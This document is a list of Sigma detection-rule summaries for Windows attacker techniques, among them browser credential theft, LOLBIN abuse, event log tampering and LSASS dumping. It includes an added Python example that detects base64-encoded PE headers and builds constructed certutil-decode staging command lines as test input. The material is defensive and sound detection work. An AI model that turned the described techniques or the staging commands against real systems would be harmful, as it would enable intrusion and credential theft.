SQLite Chromium Profile Data DB Access Detects usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing. https://github.com/redcanaryco/atomic-red-team/blob/84d9edaaaa2c5511144521b0e4af726d1c7276ce/atomics/T1539/T1539.md#atomic-test-2---steal-chrome-cookies-windows, https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/
SQLite Firefox Profile Data DB Access Detects usage of the "sqlite" binary to query databases in Firefox and other Gecko-based browsers for potential data stealing. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows, https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/
Arbitrary File Download Via Squirrel.EXE Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/, http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
Process Proxy Execution Via Squirrel.EXE Detects the usage of the "Squirrel.exe" binary to execute arbitrary processes. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.) https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/, http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/, http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
Port Forwarding Activity Via SSH.EXE Detects port forwarding activity via SSH.exe https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Program Executed Using Proxy/Local Command Via SSH.EXE Detects usage of the "ssh.exe" binary as a proxy to launch other programs. https://lolbas-project.github.io/lolbas/Binaries/Ssh/, https://github.com/LOLBAS-Project/LOLBAS/pull/211/files, https://gtfobins.github.io/gtfobins/ssh/, https://man.openbsd.org/ssh_config#ProxyCommand, https://man.openbsd.org/ssh_config#LocalCommand
Potential RDP Tunneling Via SSH Execution of ssh.exe to perform data exfiltration and tunneling through RDP https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
Potential Amazon SSM Agent Hijacking Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report. https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan, https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/, https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/
Execution via stordiag.exe Detects the use of stordiag.exe to execute schtasks.exe, systeminfo.exe and fltmc.exe https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html, https://twitter.com/eral4m/status/1451112385041911809
Start of NT Virtual DOS Machine Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support, https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7, https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/, https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/
Abused Debug Privilege by Arbitrary Parent Processes Detection of unusual child processes by different system processes https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-74-638.jpg
User Added to Local Administrators Group Detects addition of users to the local administrator group via "Net" or "Add-LocalGroupMember". https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
User Added To Highly Privileged Group Detects addition of users to highly privileged groups via "Net" or "Add-LocalGroupMember". https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
User Added to Remote Desktop Users Group Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember". https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/
Execute From Alternate Data Streams Detects execution from an Alternate Data Stream (ADS). Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md
Always Install Elevated Windows Installer Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-48-638.jpg
Potentially Suspicious Windows App Activity Detects potentially suspicious child process of applications launched from inside the WindowsApps directory. This could be a sign of a rogue ".appx" package installation/execution https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/, https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/
Arbitrary Shell Command Execution Via Settingcontent-Ms The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create "shortcuts" to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39
Phishing Pattern ISO in Archive Detects cases in which an ISO file is opened from inside an archiver such as 7-Zip or WinRAR, which is a sign of phishing: threat actors put small ISO files in archives as email attachments to bypass certain filters and protective measures (Mark of the Web) https://twitter.com/1ZRR4H/status/1534259727059787783, https://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/
Automated Collection Command Prompt Once established within a system or network, an adversary may use automated techniques for collecting internal data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
Bad Opsec Defaults Sacrificial Processes With Improper Arguments Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples. https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/, https://www.cobaltstrike.com/help-opsec, https://twitter.com/CyberRaiju/status/1251492025678983169, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32, https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool, https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool
Potential Suspicious Browser Launch From Document Reader Process Detects when a browser process or browser tab is launched from an application that handles document files, such as Adobe Reader or Microsoft Office, and connects to a web application over HTTP(S); this could indicate a possible phishing attempt. https://app.any.run/tasks/69c5abaa-92ad-45ba-8c53-c11e23e05d04/, https://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/
Potential Browser Data Stealing Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md
Suspicious Child Process Created as System Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment, https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/, https://github.com/antonioCoco/RogueWinRM, https://twitter.com/Cyb3rWard0g/status/1453123054243024897
Potential Commandline Obfuscation Using Escape Characters Detects potential commandline obfuscation using known escape characters https://twitter.com/vysecurity/status/885545634958385153, https://twitter.com/Hexacorn/status/885553465417756673, https://twitter.com/Hexacorn/status/885570278637678592, https://www.mandiant.com/resources/blog/obfuscation-wild-targeted-attackers-lead-way-evasion-techniques, https://web.archive.org/web/20190213114956/http://www.windowsinspired.com/understanding-the-command-line-string-and-arguments-received-by-a-windows-program/
Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image Detects potential commandline obfuscation using unicode characters. Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-6---dlp-evasion-via-sensitive-data-in-vba-macro-over-http
Potential Command Line Path Traversal Evasion Attempt Detects potential evasion or obfuscation attempts using bogus path traversal via the commandline https://twitter.com/hexacorn/status/1448037865435320323, https://twitter.com/Gal_B1t/status/1062971006078345217
Suspicious Copy From or To System Directory Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk. Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations. https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
Copy From Or To Admin Share Or Sysvol Folder Detects a copy command or a copy utility execution to or from an Admin share or remote https://twitter.com/SBousseaden/status/1211636381086339073, https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
Potential Crypto Mining Activity Detects command line parameters or strings often used by crypto miners https://www.poolwatch.io/coin/monero
LOL-Binary Copied From System Directory Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations. https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/
Potential Data Exfiltration Activity Via CommandLine Tools Detects the use of various CLI utilities exfiltrating data via web requests https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
Raccine Uninstall Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. https://github.com/Neo23x0/Raccine
Suspicious Double Extension File Execution Detects suspicious use of an .exe extension after a non-executable file extension, like .pdf.exe, optionally padded with a run of spaces or underscores between the two extensions to cloak the executable file in spear-phishing campaigns https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html, https://twitter.com/blackorbird/status/1140519090961825792
Suspicious Parent Double Extension File Execution Detect execution of suspicious double extension files in ParentCommandLine https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa
Suspicious Download from Office Domain Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents https://twitter.com/an0n_r0/status/1474698356635193346?s=12, https://twitter.com/mrd0x/status/1475085452784844803?s=12
DumpStack.log Defender Evasion Detects the use of the filename DumpStack.log to evade Microsoft Defender https://twitter.com/mrd0x/status/1479094189048713219
Always Install Elevated MSI Spawned Cmd And Powershell Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell" https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg
Suspicious Electron Application Child Processes Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule) https://taggart-tech.com/quasar-electron/, https://github.com/mttaggart/quasar, https://positive.security/blog/ms-officecmd-rce, https://lolbas-project.github.io/lolbas/Binaries/Msedge/, https://lolbas-project.github.io/lolbas/Binaries/Teams/, https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/, https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
Potentially Suspicious Electron Application CommandLine Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. https://positive.security/blog/ms-officecmd-rce, https://lolbas-project.github.io/lolbas/Binaries/Teams/, https://lolbas-project.github.io/lolbas/Binaries/Msedge/, https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/, https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf, https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc
Elevated System Shell Spawned From Uncommon Parent Location Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location. https://github.com/Wh04m1001/SysmonEoP
Hidden Powershell in Link File Pattern Detects events that appear when a user clicks on a link file with a PowerShell command embedded in it https://www.x86matthew.com/view_post?id=embed_exe_lnk
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. Internal Research
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. Internal Research
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3 Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. Internal Research
ETW Logging Tamper In .NET Processes Via CommandLine Detects changes to environment variables related to ETW logging via the CommandLine. This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies. https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4 Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. Internal Research
ETW Trace Evasion Activity Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion. https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil, https://abuse.io/lockergoga.txt, https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63
Suspicious Eventlog Clearing or Configuration Change Activity Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic". This technique has been used by threat actors and ransomware strains in order to evade defenses. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md, https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil, https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee, https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a, https://www.group-ib.com/blog/apt41-world-tour-2021/, https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1, http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
Potentially Suspicious Execution From Parent Process In Public Folder Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines. https://redcanary.com/blog/blackbyte-ransomware/
Process Execution From A Potentially Suspicious Folder Detects a potentially suspicious execution from an uncommon folder. https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt, https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses, https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/, https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md
Suspicious File Characteristics Due to Missing Fields Detects executables in the Downloads folder without FileVersion, Description, Product or Company fields, as is typical of binaries created with py2exe https://securelist.com/muddywater/88059/, https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection
Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe" https://twitter.com/pfiatde/status/1681977680688738305, https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/, https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/, https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3
Writing Of Malicious Files To The Fonts Folder Monitors for possibly malicious files being hidden in C:\Windows\Fonts\. Writing to and executing from this folder does not require administrative privileges. https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/
Potential Homoglyph Attack Using Lookalike Characters Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters. This is used as an obfuscation and masquerading technique. Only "perfect" homoglyphs are included; these are characters that are indistinguishable from ASCII characters and thus make excellent candidates for homoglyph attacks. https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish, http://www.irongeek.com/homoglyph-attack-generator.php
Execution Of Non-Existing File Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) https://pentestlaboratories.com/2021/12/08/process-ghosting/
Base64 MZ Header In CommandLine Detects encoded base64 MZ header in the commandline https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/
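Worked example, added to this report and not part of the Sigma rule above or its references: the rule matches literal strings such as "TVqQAAMA", which only cover a PE header sitting at the very start of the base64 blob. The Python below derives the equivalent search strings for a header preceded by one or two unknown bytes, and separately decodes every long base64 run at all four character alignments and checks for "MZ" followed by a plausible e_cparhdr field. The command lines it runs on are constructed (a certutil -decode staging pattern) and the DOS-stub bytes are the usual linker defaults.

```python
"""Alignment-aware detection of a base64-encoded PE header in a command line.
"MZ" at the start of a blob encodes to the well-known "TVqQAAMA..." text, but
the same header behind one or two leading bytes (a length prefix, a struct
wrapper) encodes to entirely different characters, and a run captured
mid-blob is shifted by 6 bits per dropped character. Added example; not from
the Sigma rule. The command lines are constructed."""
import base64
import binascii
import re

# start of a linker-produced DOS header: "MZ", e_cblp=0x90, e_cp=3, e_crlc=0, e_cparhdr=4
DOS_HEADER_PREFIX = b"MZ\x90\x00\x03\x00\x00\x00\x04\x00\x00\x00"

# a base64 run long enough to be a payload fragment rather than an ordinary word
B64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def mz_base64_prefixes(header=DOS_HEADER_PREFIX[:6]):
    """Search strings the header produces when 0, 1 or 2 unknown bytes precede it.
    Characters that also encode bits of the unknown bytes (or of whatever follows
    the header) are dropped, so each string is exact regardless of context."""
    out = []
    for pad in range(3):
        text = base64.b64encode(b"\x00" * pad + header).decode()
        first = -(-8 * pad // 6)               # first char lying wholly inside the header
        last = 8 * (pad + len(header)) // 6    # first char that spills past it
        out.append(text[first:last])
    return out


def find_base64_mz(command_line):
    """Decoded DOS-header bytes for every base64 run that carries a PE image,
    whatever the byte offset of "MZ" inside the blob and whatever the
    4-character alignment at which the run was captured."""
    hits = []
    for m in B64_RUN_RE.finditer(command_line):
        run = m.group(0)
        for drop in range(4):                  # re-align a run that starts mid-blob
            chunk = run[drop:]
            chunk = chunk[: len(chunk) - len(chunk) % 4]
            if len(chunk) < 16:
                continue
            try:
                raw = base64.b64decode(chunk, validate=True)
            except (binascii.Error, ValueError):
                continue
            idx = raw.find(b"MZ")
            # e_cparhdr (header offset 8) is 4 for a normal stub and 0 for the minimal all-zero header
            if idx != -1 and raw[idx + 8:idx + 10] in (b"\x04\x00", b"\x00\x00"):
                hits.append(raw[idx:idx + 12])
                break
    return hits


def constructed_sample(prefix_len, clip=0):
    """A constructed command line that stages a PE behind `prefix_len` filler
    bytes; `clip` drops leading base64 characters to mimic a truncated log field."""
    payload = b"\x01" * prefix_len + DOS_HEADER_PREFIX + b"\xff\xff\x00\x00\xb8\x00\x00\x00"
    blob = base64.b64encode(payload).decode()[clip:]
    return f"cmd /c echo {blob} > %TEMP%\\a.b64 & certutil -decode %TEMP%\\a.b64 %TEMP%\\a.exe"


if __name__ == "__main__":
    print(mz_base64_prefixes())
    for sample in (constructed_sample(0), constructed_sample(1), constructed_sample(3, clip=2)):
        print(sample[:60], "->", find_base64_mz(sample))
```

Literal-indicator matching is cheap and precise, so the three prefix strings can go straight into a Sigma `contains` list next to the existing ones; the decode-and-inspect path costs one base64 decode per long alphanumeric run but also catches wrapped payloads, truncated log fields and non-standard DOS stubs. The all-zero e_cparhdr branch will fire on zero-heavy blobs; drop it if that proves noisy in your telemetry.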
Potential WinAPI Calls Via CommandLine Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec https://twitter.com/m417z/status/1566674631788007425
Potentially Suspicious JWT Token Search Via CLI Detects possible search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". This string is used as an anchor to look for the start of the JWT token used by Microsoft Office and similar apps. https://mrd0x.com/stealing-tokens-from-office-applications/
Local Accounts Discovery Detects local account and system owner/user discovery using operating system utilities https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md
LOLBIN Execution From Abnormal Drive Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO. https://thedfirreport.com/2021/12/13/diavol-ransomware/, https://www.scythe.io/library/threat-emulation-qakbot, https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/
LSASS Dump Keyword In CommandLine Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. https://github.com/Hackndo/lsassy, https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml, https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/, https://github.com/helpsystems/nanodump, https://github.com/CCob/MirrorDump
Potential File Download Via MS-AppInstaller Protocol Handler Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE The downloaded files are temporarily stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\" https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/
Suspicious Network Command Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows
Suspicious Scan Loop Network Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md, https://ss64.com/nt/for.html, https://ss64.com/ps/foreach-object.html
Potential Network Sniffing Activity Using Network Tools Detects potential network sniffing via use of network tools such as "tshark", "windump". Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md
Execution of Suspicious File Type Extension Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process. This rule might require some initial baselining to align with some third party tooling in the user environment. https://pentestlaboratories.com/2021/12/08/process-ghosting/
Non-privileged Usage of Reg or Powershell Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg
Process Launched Without Image Name Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections. https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software
Suspicious Process Patterns NTDS.DIT Exfil Detects suspicious process patterns used in NTDS.DIT exfiltration https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://pentestlab.blog/tag/ntds-dit/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1, https://github.com/zcgonvh/NTDSDumpEx, https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1, https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1
Potentially Suspicious Call To Win32_NTEventlogFile Class Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85)
Use Short Name Path in Command Line Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/frack113/status/1555830623633375232
Use Short Name Path in Image Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/frack113/status/1555830623633375232
Use NTFS Short Name in Command Line Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/jonasLyk/status/1555914501802921984
Use NTFS Short Name in Image Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/jonasLyk/status/1555914501802921984
